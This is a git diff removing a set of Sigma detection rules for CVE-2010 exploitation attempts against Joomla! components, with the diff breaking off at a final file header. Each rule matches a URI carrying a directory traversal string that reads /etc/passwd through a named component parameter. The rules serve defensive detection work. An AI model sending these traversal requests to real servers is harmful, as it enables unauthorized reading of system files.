@@ -1,26 +0,0 @@ -title: CVE-2010-1313 Exploitation Attempt -id: 4287d3e9-5ba8-4a00-925b-bce992e8b2d5 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Directory - traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and - 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers - to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1314_exploitation_attempt.yml b/rules/web/web_cve_2010_1314_exploitation_attempt.yml deleted file mode 100644 index 22c062b9..00000000 --- a/rules/web/web_cve_2010_1314_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1314 Exploitation Attempt -id: 0ce79c5d-cb0c-4800-a040-a0c8c7ad45d1 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory traversal - vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! - allows remote attackers to read arbitrary files via a .. (dot dot) in the controller - parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1345_exploitation_attempt.yml b/rules/web/web_cve_2010_1345_exploitation_attempt.yml deleted file mode 100644 index e03153f1..00000000 --- a/rules/web/web_cve_2010_1345_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1345 Exploitation Attempt -id: b92bc21b-e649-4695-8f7c-8b881e33ed1c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Directory - traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1353_exploitation_attempt.yml b/rules/web/web_cve_2010_1353_exploitation_attempt.yml deleted file mode 100644 index 17d6462a..00000000 --- a/rules/web/web_cve_2010_1353_exploitation_attempt.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1353 Exploitation Attempt -id: 3a9f4835-3518-40e9-91bc-ebb1d918c055 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component LoginBox - Local File Inclusion:Directory traversal - vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical 
diff --git a/rules/web/web_cve_2010_1354_exploitation_attempt.yml b/rules/web/web_cve_2010_1354_exploitation_attempt.yml deleted file mode 100644 index 0c88d17b..00000000 --- a/rules/web/web_cve_2010_1354_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1354 Exploitation Attempt -id: 841e7037-c68e-40d1-9fd4-d08fee87f124 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traversal - vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1470_exploitation_attempt.yml b/rules/web/web_cve_2010_1470_exploitation_attempt.yml deleted file mode 100644 index 00e0319d..00000000 --- a/rules/web/web_cve_2010_1470_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1470 Exploitation Attempt -id: 91dcce8a-b0dc-49e8-a766-9bd0d234d397 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory traversal - vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote - attackers to read arbitrary files and possibly have unspecified other impact via - a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1471_exploitation_attempt.yml b/rules/web/web_cve_2010_1471_exploitation_attempt.yml deleted file mode 100644 index af7e60db..00000000 --- a/rules/web/web_cve_2010_1471_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1471 Exploitation Attempt -id: c25e9c8b-5bc3-4eda-a29e-62ed09349442 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directory - traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for - Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1472_exploitation_attempt.yml b/rules/web/web_cve_2010_1472_exploitation_attempt.yml deleted file mode 100644 index 7caddd10..00000000 --- a/rules/web/web_cve_2010_1472_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1472 Exploitation Attempt -id: d189b718-577a-4826-ba75-7965be24403f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory traversal - vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! - allows remote attackers to read arbitrary files via a .. (dot dot) in the controller - parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1473_exploitation_attempt.yml b/rules/web/web_cve_2010_1473_exploitation_attempt.yml deleted file mode 100644 index b48610e1..00000000 --- a/rules/web/web_cve_2010_1473_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1473 Exploitation Attempt -id: 51848efa-1963-4f90-b9ca-e614ab66c848 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory traversal - vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1474_exploitation_attempt.yml b/rules/web/web_cve_2010_1474_exploitation_attempt.yml deleted file mode 100644 index 25da0891..00000000 --- a/rules/web/web_cve_2010_1474_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1474 Exploitation Attempt -id: dcb1e22b-b95e-40b0-a95c-620baf73e56d -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory traversal - vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! - allows remote attackers to read arbitrary files and possibly have unspecified other - impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1475_exploitation_attempt.yml b/rules/web/web_cve_2010_1475_exploitation_attempt.yml deleted file mode 100644 index 94ed4d8f..00000000 --- a/rules/web/web_cve_2010_1475_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1475 Exploitation Attempt -id: 58505c84-2d43-4686-9fd3-497a7e4f89a3 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion:Directory - traversal vulnerability in the Preventive & Reservation (com_preventive) component - 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1476_exploitation_attempt.yml b/rules/web/web_cve_2010_1476_exploitation_attempt.yml deleted file mode 100644 index fb13d546..00000000 --- a/rules/web/web_cve_2010_1476_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1476 Exploitation Attempt -id: a095b6d3-0c40-4719-aa55-01dcb47bc03f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Directory - traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1494_exploitation_attempt.yml b/rules/web/web_cve_2010_1494_exploitation_attempt.yml deleted file mode 100644 index 2a20d4b9..00000000 --- a/rules/web/web_cve_2010_1494_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1494 Exploitation Attempt -id: 4c7ff51e-47cb-4f89-8a1c-ec71be8d811a -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory traversal - vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1495_exploitation_attempt.yml b/rules/web/web_cve_2010_1495_exploitation_attempt.yml deleted file mode 100644 index 2db4bbab..00000000 --- a/rules/web/web_cve_2010_1495_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1495 Exploitation Attempt -id: d87e5c39-a7ed-4f34-8be1-ad1697f3d7d7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory traversal - vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical 
diff --git a/rules/web/web_cve_2010_1532_exploitation_attempt.yml b/rules/web/web_cve_2010_1532_exploitation_attempt.yml deleted file mode 100644 index a0fc22ad..00000000 --- a/rules/web/web_cve_2010_1532_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1532 Exploitation Attempt -id: 2abfc7f1-cf26-44c4-a3ff-5033bfe6b855 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Directory - traversal vulnerability in the givesight PowerMail Pro (com_powermail) component - 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1533_exploitation_attempt.yml b/rules/web/web_cve_2010_1533_exploitation_attempt.yml deleted file mode 100644 index 034bfb71..00000000 --- a/rules/web/web_cve_2010_1533_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1533 Exploitation Attempt -id: a97dbf8e-5234-4821-9033-d1209c55415c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory traversal - vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1534_exploitation_attempt.yml b/rules/web/web_cve_2010_1534_exploitation_attempt.yml deleted file mode 100644 index ce58f784..00000000 --- a/rules/web/web_cve_2010_1534_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1534 Exploitation Attempt -id: 2a9be005-a6b9-4cdc-aa9e-4d08ba721143 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory traversal - vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical 
diff --git a/rules/web/web_cve_2010_1535_exploitation_attempt.yml b/rules/web/web_cve_2010_1535_exploitation_attempt.yml deleted file mode 100644 index 3adce8a2..00000000 --- a/rules/web/web_cve_2010_1535_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1535 Exploitation Attempt -id: ce1c278f-5c58-4846-93eb-3fd21ed6b41c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory traversal - vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1601_exploitation_attempt.yml b/rules/web/web_cve_2010_1601_exploitation_attempt.yml deleted file mode 100644 index 208fd52b..00000000 --- a/rules/web/web_cve_2010_1601_exploitation_attempt.yml +++ /dev/null 
@@ -1,25 +0,0 @@ -title: CVE-2010-1601 Exploitation Attempt -id: b2dd80fa-e3bf-4321-bc39-c37295d513dd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JA Comment - Local File Inclusion:Directory traversal - vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1602_exploitation_attempt.yml b/rules/web/web_cve_2010_1602_exploitation_attempt.yml deleted file mode 100644 index a41a645d..00000000 --- a/rules/web/web_cve_2010_1602_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1602 Exploitation Attempt -id: f042c30f-ec39-4d1f-bc8b-56c94cd870a7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directory - traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1607_exploitation_attempt.yml b/rules/web/web_cve_2010_1607_exploitation_attempt.yml deleted file mode 100644 index 6fdab6d4..00000000 --- a/rules/web/web_cve_2010_1607_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1607 Exploitation Attempt -id: 699e3765-a82a-4d7c-8214-8e8fe7c57fdd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traversal - vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) - component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1657_exploitation_attempt.yml b/rules/web/web_cve_2010_1657_exploitation_attempt.yml deleted file mode 100644 index d861dbc2..00000000 --- a/rules/web/web_cve_2010_1657_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1657 Exploitation Attempt -id: e218a3bd-5583-4737-a993-60c14a6839a8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory traversal - vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1659_exploitation_attempt.yml b/rules/web/web_cve_2010_1659_exploitation_attempt.yml deleted file mode 100644 index e2208448..00000000 --- a/rules/web/web_cve_2010_1659_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1659 Exploitation Attempt -id: dde389b6-a56a-48a6-98f6-a58ea7adc0b6 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Directory - traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component - 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1714_exploitation_attempt.yml b/rules/web/web_cve_2010_1714_exploitation_attempt.yml deleted file mode 100644 index 16d1438a..00000000 --- a/rules/web/web_cve_2010_1714_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1714 Exploitation Attempt -id: 52e333b4-a627-44d5-818d-c222c47568e4 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory traversal - vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1717_exploitation_attempt.yml b/rules/web/web_cve_2010_1717_exploitation_attempt.yml deleted file mode 100644 index b0533786..00000000 --- a/rules/web/web_cve_2010_1717_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1717 Exploitation Attempt -id: 7b5b8495-759b-4ebe-917e-7902579036d9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory traversal - vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1718_exploitation_attempt.yml b/rules/web/web_cve_2010_1718_exploitation_attempt.yml deleted file mode 100644 index 67d257ae..00000000 --- a/rules/web/web_cve_2010_1718_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1718 Exploitation Attempt -id: b263bad9-acf2-45d6-a1e7-bfde91cdcf08 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Directory - traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) - component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1719_exploitation_attempt.yml b/rules/web/web_cve_2010_1719_exploitation_attempt.yml deleted file mode 100644 index c5589c7f..00000000 --- a/rules/web/web_cve_2010_1719_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1719 Exploitation Attempt -id: 77d936f8-0b09-4996-bb2e-52893a34f91f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Directory - traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1722_exploitation_attempt.yml b/rules/web/web_cve_2010_1722_exploitation_attempt.yml deleted file mode 100644 index 98629be1..00000000 --- a/rules/web/web_cve_2010_1722_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1722 Exploitation Attempt -id: 26b7051c-48b7-4212-ac5e-c8799fe80bdf -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Online Market 2.x - Local File Inclusion:Directory - traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! - allows remote attackers to read arbitrary files and possibly have unspecified other - impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1875_exploitation_attempt.yml b/rules/web/web_cve_2010_1875_exploitation_attempt.yml deleted file mode 100644 index fff7c165..00000000 --- a/rules/web/web_cve_2010_1875_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1875 Exploitation Attempt -id: 28aadbf4-5125-4e7c-9f79-c907363bebd2 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Property - Local File Inclusion:Directory traversal - vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for - Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1953_exploitation_attempt.yml b/rules/web/web_cve_2010_1953_exploitation_attempt.yml deleted file mode 100644 index 68fd370b..00000000 --- a/rules/web/web_cve_2010_1953_exploitation_attempt.yml +++ /dev/null 
